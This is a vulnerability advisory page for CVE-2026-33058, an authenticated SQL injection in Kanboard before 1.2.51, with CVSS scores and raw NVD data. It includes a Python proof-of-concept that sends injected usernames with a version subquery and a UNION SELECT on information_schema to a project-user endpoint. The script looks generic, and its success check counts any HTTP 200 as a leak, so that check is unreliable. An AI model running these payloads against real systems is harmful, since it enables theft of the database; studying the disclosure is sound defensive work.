Security Vulnerability Report
CVE-2026-33058 CVSS 6.5 MEDIUM

Published: 2026-03-18 04:17:28
Last Modified: 2026-03-18 17:52:14

Description

Kanboard is project management software focused on Kanban methodology. Versions prior to 1.2.51 have an authenticated SQL injection vulnerability. Attackers with the permission to add users to a project can leverage this vulnerability to dump the entirety of the kanboard database. Version 1.2.51 fixes the issue.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:kanboard:kanboard:*:*:*:*:*:*:*:* - VULNERABLE
Kanboard < 1.2.51

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2026-33058 SQL Injection PoC for Kanboard < 1.2.51
# Target: Kanboard application with project user management permission

TARGET_URL = "http://target-kanboard-url"
API_KEY = "your-kanboard-api-key"
PROJECT_ID = "1"


def exploit_sql_injection():
    """
    SQL Injection PoC - Extract database version information
    This demonstrates the vulnerability in project user addition functionality
    """
    headers = {
        "Authorization": f"Bearer {API_KEY}",
        "Content-Type": "application/json"
    }

    # Malicious payload to extract database version via SQL injection
    # In real exploitation, attacker uses this to dump entire database
    payload = {
        "project_id": PROJECT_ID,
        "username": "test_user', (SELECT @@version)-- -",
        "role": "member"
    }

    endpoint = f"{TARGET_URL}/?controller=ProjectUserController&action=save"

    try:
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
        print(f"[*] Request sent to {endpoint}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text[:500]}")

        if "version" in response.text.lower() or response.status_code == 200:
            print("[+] Potential SQL injection successful - database info leaked")
        else:
            print("[-] No obvious response, manual verification needed")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")


def extract_database_schema():
    """
    Advanced exploitation: Extract all table names from database
    """
    headers = {
        "Authorization": f"Bearer {API_KEY}",
        "Content-Type": "application/json"
    }

    # Payload to extract all table names using UNION injection
    payload = {
        "project_id": PROJECT_ID,
        "username": "admin' UNION SELECT table_name FROM information_schema.tables-- -",
        "role": "member"
    }

    endpoint = f"{TARGET_URL}/?controller=ProjectUserController&action=save"
    response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
    return response.text


if __name__ == "__main__":
    print("="*60)
    print("CVE-2026-33058 Kanboard SQL Injection PoC")
    print("="*60)
    exploit_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33058", "sourceIdentifier": "[email protected]", "published": "2026-03-18T04:17:27.727", "lastModified": "2026-03-18T17:52:14.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kanboard is project management software focused on Kanban methodology. Versions prior to 1.2.51 have an authenticated SQL injection vulnerability. Attackers with the permission to add users to a project can leverage this vulnerability to dump the entirety of the kanboard database. Version 1.2.51 fixes the issue."}, {"lang": "es", "value": "Kanboard es un software de gestión de proyectos enfocado en la metodología Kanban. Las versiones anteriores a la 1.2.51 tienen una vulnerabilidad de inyección SQL autenticada. Los atacantes con permiso para añadir usuarios a un proyecto pueden aprovechar esta vulnerabilidad para volcar la totalidad de la base de datos de Kanboard. La versión 1.2.51 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kanboard:kanboard:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.2.51", "matchCriteriaId": "072A459D-CB3E-4256-ACB0-F83BE3E0B89A"}]}]}], "references": [{"url": "https://github.com/kanboard/kanboard/security/advisories/GHSA-f62r-m4mr-2xhh", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}